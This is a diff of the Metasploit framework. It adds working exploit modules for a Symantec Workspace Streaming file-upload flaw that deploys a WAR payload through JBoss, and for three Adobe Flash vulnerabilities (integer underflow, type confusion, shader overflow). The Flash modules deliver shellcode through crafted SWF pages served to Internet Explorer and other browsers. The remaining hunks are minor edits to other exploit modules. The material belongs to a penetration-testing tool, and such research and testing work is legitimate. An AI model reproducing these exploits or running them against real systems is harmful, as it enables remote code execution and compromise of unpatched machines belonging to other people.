diff --git a/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
new file mode 100644
index 0000000000..c7fe29df13
--- /dev/null
+++ b/modules/exploits/windows/antivirus/symantec_workspace_streaming_exec.rb
@@ -0,0 +1,356 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rexml/document'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  include REXML
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Symantec Workspace Streaming Arbitrary File Upload',
+      'Description' => %q{
+        This module exploits a code execution flaw in Symantec Workspace Streaming. The
+        vulnerability exists in the ManagementAgentServer.putFile XMLRPC call exposed by the
+        as_agent.exe service, which allows for uploading arbitrary files under the server root.
+        This module abuses the auto deploy feature in the JBoss as_ste.exe instance in order
+        to achieve remote code execution. This module has been tested successfully on Symantec
+        Workspace Streaming 6.1 SP8 and Windows 2003 SP2. Abused services listen on a single
+        machine deployment, and also in the backend role in a multiple machine deployment.
+      },
+      'Author'       =>
+        [
+          'rgod <rgod[at]autistici.org>', # Vulnerability discovery
+          'juan vazquez' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['CVE', '2014-1649'],
+          ['BID', '67189'],
+          ['ZDI', '14-127'],
+          ['URL', 'http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140512_00']
+        ],
+      'Privileged'  => true,
+      'Platform'    => 'java',
+      'Arch' => ARCH_JAVA,
+      'Targets'     =>
+        [
+          [ 'Symantec Workspace Streaming 6.1 SP8 / Java Universal', {} ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'May 12 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9855), # as_agent.exe (afuse XMLRPC to upload arbitrary file)
+        OptPort.new('STE_PORT', [true, "The remote as_ste.exe AS server port", 9832]), # as_ste.exe (abuse jboss auto deploy)
+      ], self.class)
+  end
+
+  def send_xml_rpc_request(xml)
+    res = send_request_cgi(
+      {
+        'uri'     => normalize_uri("/", "xmlrpc"),
+        'method'  => 'POST',
+        'ctype'   => 'text/xml; charset=UTF-8',
+        'data'    => xml
+      })
+
+    res
+  end
+
+  def build_soap_get_file(file_path)
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.getFile"
+
+    params = xml.root.add_element("params")
+
+    param_server_root = params.add_element("param")
+    value_server_root = param_server_root.add_element("value")
+    value_server_root.text = "*AWESE"
+
+    param_file_type = params.add_element("param")
+    value_file_type = param_file_type.add_element("value")
+    type_file_type = value_file_type.add_element("i4")
+    type_file_type.text = "0" # build path from the server root directory
+
+    param_file_name = params.add_element("param")
+    value_file_name = param_file_name.add_element("value")
+    value_file_name.text = file_path
+
+    param_file_binary = params.add_element("param")
+    value_file_binary = param_file_binary.add_element("value")
+    type_file_binary = value_file_binary.add_element("boolean")
+    type_file_binary.text = "0"
+
+    xml << XMLDecl.new("1.0", "UTF-8")
+
+    xml.to_s
+  end
+
+  def build_soap_put_file(file)
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.putFile"
+
+    params = xml.root.add_element("params")
+
+    param_server_root = params.add_element("param")
+    value_server_root = param_server_root.add_element("value")
+    value_server_root.text = "*AWESE"
+
+    param_file_type = params.add_element("param")
+    value_file_type = param_file_type.add_element("value")
+    type_file_type = value_file_type.add_element("i4")
+    type_file_type.text = "0" # build path from the server root directory
+
+    param_file = params.add_element("param")
+    value_file = param_file.add_element("value")
+    type_value_file = value_file.add_element("ex:serializable")
+    type_value_file.text = file
+
+    xml << XMLDecl.new("1.0", "UTF-8")
+
+    xml.to_s
+  end
+
+  def build_soap_check_put
+    xml = Document.new
+    xml.add_element(
+        "methodCall",
+        {
+            'xmlns:ex' => "http://ws.apache.org/xmlrpc/namespaces/extensions"
+        })
+    method_name = xml.root.add_element("methodName")
+    method_name.text = "ManagementAgentServer.putFile"
+    xml.root.add_element("params")
+    xml << XMLDecl.new("1.0", "UTF-8")
+    xml.to_s
+  end
+
+  def parse_method_response(xml)
+    doc = Document.new(xml)
+    file = XPath.first(doc, "methodResponse/params/param/value/ex:serializable")
+
+    unless file.nil?
+      file = Rex::Text.decode_base64(file.text)
+    end
+
+    file
+  end
+
+  def get_file(path)
+    xml_call = build_soap_get_file(path)
+    file = nil
+
+    res = send_xml_rpc_request(xml_call)
+
+    if res && res.code == 200 && res.body
+      file = parse_method_response(res.body.to_s)
+    end
+
+    file
+  end
+
+  def put_file(file)
+    result = nil
+    xml_call = build_soap_put_file(file)
+
+    res = send_xml_rpc_request(xml_call)
+
+    if res && res.code == 200 && res.body
+      result = parse_method_response(res.body.to_s)
+    end
+
+    result
+  end
+
+  def upload_war(war_name, war, dst)
+    result = false
+    java_file = build_java_file_info("#{dst}#{war_name}", war)
+    java_file = Rex::Text.encode_base64(java_file)
+
+    res = put_file(java_file)
+
+    if res && res =~ /ReturnObject.*StatusMessage.*Boolean/
+      result = true
+    end
+
+    result
+  end
+
+  def jboss_deploy_path
+    path = nil
+    leak = get_file("bin/CreateDatabaseSchema.cmd")
+
+    if leak && leak =~ /\[INSTALLDIR\](.*)ste\/ste.jar/
+      path = $1
+    end
+
+    path
+  end
+
+  def check
+    check_result = Exploit::CheckCode::Safe
+
+    if jboss_deploy_path.nil?
+      xml = build_soap_check_put
+      res = send_xml_rpc_request(xml)
+
+      if res && res.code == 200 && res.body && res.body.to_s =~ /No method matching arguments/
+        check_result =  Exploit::CheckCode::Detected
+      end
+    else
+      check_result =  Exploit::CheckCode::Appears
+    end
+
+    check_result
+  end
+
+  def exploit
+    print_status("#{peer} - Leaking the jboss deployment directory...")
+    jboss_path =jboss_deploy_path
+
+    if jboss_path.nil?
+      fail_with(Exploit::Unknown, "#{peer} - Failed to disclose the jboss deployment directory")
+    end
+
+    print_status("#{peer} - Building WAR payload...")
+
+    app_name = Rex::Text.rand_text_alpha(4 + rand(4))
+    war_name = "#{app_name}.war"
+    war = payload.encoded_war({ :app_name => app_name }).to_s
+    deploy_dir = "..#{jboss_path}"
+
+    print_status("#{peer} - Uploading WAR payload...")
+
+    res = upload_war(war_name, war, deploy_dir)
+
+    unless res
+      fail_with(Exploit::Unknown, "#{peer} - Failed to upload the war payload")
+    end
+
+    register_files_for_cleanup("../server/appstream/deploy/#{war_name}")
+
+    10.times do
+      select(nil, nil, nil, 2)
+
+      # Now make a request to trigger the newly deployed war
+      print_status("#{rhost}:#{ste_port} - Attempting to launch payload in deployed WAR...")
+      res = send_request_cgi(
+        {
+          'uri'    => normalize_uri("/", app_name, Rex::Text.rand_text_alpha(rand(8)+8)),
+          'method' => 'GET',
+          'rport'  => ste_port # Auto Deploy can be reached through the "as_ste.exe" service
+        })
+      # Failure. The request timed out or the server went away.
+      break if res.nil?
+      # Success! Triggered the payload, should have a shell incoming
+      break if res.code == 200
+    end
+
+  end
+
+  def ste_port
+    datastore['STE_PORT']
+  end
+
+  # com.appstream.cm.general.FileInfo serialized object
+  def build_java_file_info(file_name, contents)
+    stream =  "\xac\xed" # stream magic
+    stream << "\x00\x05" # stream version
+    stream << "\x73" # new Object
+
+    stream << "\x72" # TC_CLASSDESC
+    stream << ["com.appstream.cm.general.FileInfo".length].pack("n")
+    stream << "com.appstream.cm.general.FileInfo"
+    stream << "\xa3\x02\xb6\x1e\xa1\x6b\xf0\xa7" # class serial version identifier
+    stream << "\x02" # flags SC_SERIALIZABLE
+    stream << [6].pack("n") # number of fields in the class
+
+    stream << "Z" # boolean
+    stream << ["bLastPage".length].pack("n")
+    stream << "bLastPage"
+
+    stream << "J" # long
+    stream << ["lFileSize".length].pack("n")
+    stream << "lFileSize"
+
+    stream << "[" # array
+    stream << ["baContent".length].pack("n")
+    stream << "baContent"
+    stream << "\x74" # TC_STRING
+    stream << ["[B".length].pack("n")
+    stream << "[B" # field's type (byte array)
+
+    stream << "L" # Object
+    stream << ["dTimeStamp".length].pack("n")
+    stream << "dTimeStamp"
+    stream << "\x74" # TC_STRING
+    stream << ["Ljava/util/Date;".length].pack("n")
+    stream << "Ljava/util/Date;" #field's type (Date)
+
+    stream << "L" # Object
+    stream << ["sContent".length].pack("n")
+    stream << "sContent"
+    stream << "\x74" # TC_STRING
+    stream << ["Ljava/lang/String;".length].pack("n")
+    stream << "Ljava/lang/String;" #field's type (String)
+
+    stream << "L" # Object
+    stream << ["sFileName".length].pack("n")
+    stream << "sFileName"
+    stream << "\x71" # TC_REFERENCE
+    stream << [0x007e0003].pack("N") # handle
+
+    stream << "\x78" # TC_ENDBLOCKDATA
+    stream << "\x70" # TC_NULL
+
+    # Values
+    stream << [1].pack("c") # bLastPage
+
+    stream << [0xffffffff, 0xffffffff].pack("NN") # lFileSize
+
+    stream << "\x75" # TC_ARRAY
+    stream << "\x72" # TC_CLASSDESC
+    stream << ["[B".length].pack("n")
+    stream << "[B" # byte array)
+    stream << "\xac\xf3\x17\xf8\x06\x08\x54\xe0" # class serial version identifier
+    stream << "\x02" # flags SC_SERIALIZABLE
+    stream << [0].pack("n") # number of fields in the class
+    stream << "\x78" # TC_ENDBLOCKDATA
+    stream << "\x70" # TC_NULL
+    stream << [contents.length].pack("N")
+    stream << contents # baContent
+
+    stream << "\x70" # TC_NULL # dTimeStamp
+
+    stream << "\x70" # TC_NULL # sContent
+
+    stream << "\x74" # TC_STRING
+    stream << [file_name.length].pack("n")
+    stream << file_name # sFileName
+
+    stream
+  end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_avm2.rb b/modules/exploits/windows/browser/adobe_flash_avm2.rb
new file mode 100644
index 0000000000..8f423e53e0
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_avm2.rb
@@ -0,0 +1,132 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player Integer Underflow Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player
+        before 12.0.0.43. By supplying a specially crafted swf file it is possible to trigger an
+        integer underflow in several avm2 instructions, which can be turned into remote code
+        execution under the context of the user, as exploited in the wild in February 2014. This
+        module has been tested successfully with Adobe Flash Player 11.7.700.202 on Windows XP
+        SP3, Windows 7 SP1 and Adobe Flash Player 11.3.372.94 on Windows 8 even when it includes
+        rop chains for several Flash 11 versions, as exploited in the wild.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown',     # vulnerability discovery and exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2014-0497' ],
+          [ 'OSVDB', '102849' ],
+          [ 'BID', '65327' ],
+          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-04.html' ],
+          [ 'URL', 'http://blogs.technet.com/b/mmpc/archive/2014/02/17/a-journey-to-cve-2014-0497-exploit.aspx' ],
+          [ 'URL', 'http://blog.vulnhunt.com/index.php/2014/02/20/cve-2014-0497_analysis/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 1024,
+          'DisableNops' => true
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false
+        },
+      'Platform'       => 'win',
+      # Versions targeted in the wild:
+      # [*] Windows 8:
+      #   11,3,372,94, 11,3,375,10, 11,3,376,12, 11,3,377,15, 11,3,378,5, 11,3,379,14
+      #   11,6,602,167, 11,6,602,171 ,11,6,602,180
+      #   11,7,700,169, 11,7,700,202, 11,7,700,224
+      # [*] Before windows 8:
+      #   11,0,1,152,
+      #   11,1,102,55, 11,1,102,62, 11,1,102,63
+      #   11,2,202,228, 11,2,202,233, 11,2,202,235
+      #   11,3,300,257, 11,3,300,273
+      #   11,4,402,278
+      #   11,5,502,110, 11,5,502,135, 11,5,502,146, 11,5,502,149
+      #   11,6,602,168, 11,6,602,171, 11,6,602,180
+      #   11,7,700,169, 11,7,700,202
+      #   11,8,800,97, 11,8,800,50
+     'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          :method  => "LoadMovie",
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => Msf::HttpClients::IE,
+          :flash   => lambda { |ver| ver =~ /^11\./ }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Feb 5 2014",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF...")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status("Sending HTML...")
+    tag = retrieve_tag(cli, request)
+    profile = get_profile(tag)
+    profile[:tried] = false unless profile.nil? # to allow request the swf
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    shellcode = get_payload(cli, target_info).unpack("H*")[0]
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="id=<%=shellcode%>" />
+    <param name="Play" value="true" />
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0497", "Vickers.swf" )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
new file mode 100644
index 0000000000..2d116975a8
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_filters_type_confusion.rb
@@ -0,0 +1,130 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player Type Confusion Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a type confusion vulnerability found in the ActiveX
+        component of Adobe Flash Player. This vulnerability was found exploited
+        in the wild in November 2013. This module has been tested successfully
+        on IE 6 to IE 10 with Flash 11.7, 11.8 and 11.9 prior to 11.9.900.170
+        over Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery and exploit in the wild
+          'bannedit', # Exploit in the wild discoverer, analysis and reporting
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2013-5331' ],
+          [ 'OSVDB', '100774'],
+          [ 'BID', '64199'],
+          [ 'URL', 'http://helpx.adobe.com/security/products/flash-player/apsb13-28.html' ],
+          [ 'URL', 'http://blog.malwaretracker.com/2014/01/cve-2013-5331-evaded-av-by-using.html' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 2000,
+          'DisableNops' => true,
+          'PrependEncoder' => stack_adjust
+        },
+      'DefaultOptions'  =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false,
+          'EXITFUNC'             => "thread"
+        },
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :clsid   => "{D27CDB6E-AE6D-11cf-96B8-444553540000}",
+          :method  => "LoadMovie",
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => Msf::HttpClients::IE,
+          :flash   => lambda { |ver| ver =~ /^11\.[7|8|9]/ && ver < '11.9.900.170' }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Dec 10 2013",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def stack_adjust
+    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
+    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
+    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
+    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+
+    adjust
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF...")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status("Sending HTML...")
+    tag = retrieve_tag(cli, request)
+    profile = get_profile(tag)
+    profile[:tried] = false unless profile.nil? # to allow request the swf
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    flash_payload = ""
+    get_payload(cli,target_info).unpack("V*").each do |i|
+      flash_payload << "0x#{i.to_s(16)},"
+    end
+    flash_payload.gsub!(/,$/, "")
+
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=flash_payload%>" />
+    <param name="Play" value="true" />
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2013-5331", "Exploit.swf" )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
diff --git a/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
new file mode 100644
index 0000000000..371489b0fd
--- /dev/null
+++ b/modules/exploits/windows/browser/adobe_flash_pixel_bender_bof.rb
@@ -0,0 +1,129 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::BrowserExploitServer
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Adobe Flash Player Shader Buffer Overflow",
+      'Description'    => %q{
+        This module exploits a buffer overflow vulnerability in Adobe Flash Player. The
+        vulnerability occurs in the flash.Display.Shader class, when setting specially
+        crafted data as its bytecode, as exploited in the wild in April 2014. This module
+        has been tested successfully on IE 6 to IE 11 with Flash 11, Flash 12 and Flash 13
+        over Windows XP SP3, Windows 7 SP1 and Windows 8.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Unknown', # Vulnerability discovery and exploit in the wild
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          ['CVE', '2014-0515'],
+          ['BID', '67092'],
+          ['URL', 'http://helpx.adobe.com/security/products/flash-player/apsb14-13.html'],
+          ['URL', 'http://www.securelist.com/en/blog/8212/New_Flash_Player_0_day_CVE_2014_0515_used_in_watering_hole_attacks'],
+          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/analyzing-cve-2014-0515-the-recent-flash-zero-day/' ]
+        ],
+      'Payload'        =>
+        {
+          'Space' => 2000,
+          'DisableNops' => true,
+          'PrependEncoder' => stack_adjust
+        },
+      'DefaultOptions'  =>
+        {
+          # Disabled by default to allow sessions on Firefox, still useful when exploiting IE
+          #'InitialAutoRunScript' => 'migrate -f',
+          'Retries'              => false,
+          'EXITFUNC'             => "thread"
+        },
+      'Platform'       => 'win',
+      'BrowserRequirements' =>
+        {
+          :source  => /script|headers/i,
+          :os_name => Msf::OperatingSystems::WINDOWS,
+          :ua_name => lambda { |ua| ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF || ua == Msf::HttpClients::SAFARI},
+          :flash   => lambda { |ver| ver =~ /^11\./ || ver =~ /^12\./ || (ver =~ /^13\./ && ver <= '13.0.0.182') }
+        },
+      'Targets'        =>
+        [
+          [ 'Automatic', {} ]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "Apr 28 2014",
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    @swf = create_swf
+    super
+  end
+
+  def stack_adjust
+    adjust = "\x64\xa1\x18\x00\x00\x00"  # mov eax, fs:[0x18 # get teb
+    adjust << "\x83\xC0\x08"             # add eax, byte 8 # get pointer to stacklimit
+    adjust << "\x8b\x20"                 # mov esp, [eax] # put esp at stacklimit
+    adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset
+
+    adjust
+  end
+
+  def on_request_exploit(cli, request, target_info)
+    print_status("Request: #{request.uri}")
+
+    if request.uri =~ /\.swf$/
+      print_status("Sending SWF...")
+      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+      return
+    end
+
+    print_status("Sending HTML...")
+    tag = retrieve_tag(cli, request)
+    profile = get_profile(tag)
+    profile[:tried] = false unless profile.nil? # to allow request the swf
+    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+  end
+
+  def exploit_template(cli, target_info)
+    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+    flash_payload = ""
+    get_payload(cli,target_info).unpack("V*").each do |i|
+      flash_payload << "0x#{i.to_s(16)},"
+    end
+    flash_payload.gsub!(/,$/, "")
+
+
+    html_template = %Q|<html>
+    <body>
+    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
+    <param name="movie" value="<%=swf_random%>" />
+    <param name="allowScriptAccess" value="always" />
+    <param name="FlashVars" value="sh=<%=flash_payload%>" />
+    <param name="Play" value="true" />
+    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=flash_payload%>" Play="true"/>
+    </object>
+    </body>
+    </html>
+    |
+
+    return html_template, binding()
+  end
+
+  def create_swf
+    path = ::File.join( Msf::Config.data_directory, "exploits", "CVE-2014-0515", "Graph.swf" )
+    swf =  ::File.open(path, 'rb') { |f| swf = f.read }
+
+    swf
+  end
+
+end
diff --git a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
index 3db798b445..f49f7564fe 100644
--- a/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
+++ b/modules/exploits/windows/browser/apple_quicktime_texml_font_table.rb
@@ -296,4 +296,4 @@ int __fastcall sub_67EED2B0(int a1, int a2)
   }
   return result;
 }
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
index f7e054fd4f..d41e74d73d 100644
--- a/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
+++ b/modules/exploits/windows/browser/ca_brightstor_addcolumn.rb
@@ -19,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
         could overflow a buffer and execute arbitrary code on the system.
       },
       'License'        => MSF_LICENSE,
-      'Author'         => [ 'dean <dean [at] zerodaysolutions [dot] com>' ],
+      'Author'         => [ 'dean <dean[at]zerodaysolutions.com>' ],
       'References'     =>
         [
           [ 'CVE', '2008-1472' ],
diff --git a/modules/exploits/windows/browser/clear_quest_cqole.rb b/modules/exploits/windows/browser/clear_quest_cqole.rb
index 0f8dff21d5..b134a86e38 100644
--- a/modules/exploits/windows/browser/clear_quest_cqole.rb
+++ b/modules/exploits/windows/browser/clear_quest_cqole.rb
@@ -155,4 +155,4 @@ ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and
 the stack. The ret from MFC80U!_AfxDispatchCall allows to get control on a reliable way when DEP is
 disabled
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
index 3a1a2953dc..4d4ac2ce78 100644
--- a/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
+++ b/modules/exploits/windows/browser/crystal_reports_printcontrol.rb
@@ -311,4 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/dxstudio_player_exec.rb b/modules/exploits/windows/browser/dxstudio_player_exec.rb
index 4f53c8192d..9519709c03 100644
--- a/modules/exploits/windows/browser/dxstudio_player_exec.rb
+++ b/modules/exploits/windows/browser/dxstudio_player_exec.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-  include Msf::Exploit::CmdStagerVBS
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -50,6 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           [ 'Automatic', { } ],
         ],
+      'CmdStagerFlavor' => 'vbs',
       'DisclosureDate' => 'Jun 09 2009',
       'DefaultTarget'  => 0))
   end
diff --git a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
index 0fc4a1113c..0063e8ec4e 100644
--- a/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
+++ b/modules/exploits/windows/browser/foxit_reader_plugin_url_bof.rb
@@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
       sploit << self.send(my_target[:rop])
       sploit << p.encoded
 
-      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-all')
+      resp['Location'] = request.uri + '.pdf?' + Rex::Text.uri_encode(sploit, 'hex-noslashes')
       cli.send_response(resp)
 
       # handle the payload
diff --git a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
index b136a41c9f..9f2a5f660b 100644
--- a/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
+++ b/modules/exploits/windows/browser/hp_alm_xgo_setshapenodetype_exec.rb
@@ -267,4 +267,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
index 2a9cfd1ae2..f426d31d07 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilebinary.rb
@@ -253,4 +253,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
index f6a01d021d..cb807d442f 100644
--- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
@@ -147,4 +147,4 @@ class Metasploit3 < Msf::Exploit::Remote
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end
 
-end
\ No newline at end of file
+end
diff --git a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
index c85c94dcc8..88cf7fba5f 100644
--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -474,4 +474,4 @@ end
 .text:10018A06                 push    eax
 .text:10018A07                 call    dword ptr [ecx] # woot!
 
-=end
\ No newline at end of file
+=end
diff --git a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
index b3f677f8cc..6f5b430820 100644
--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
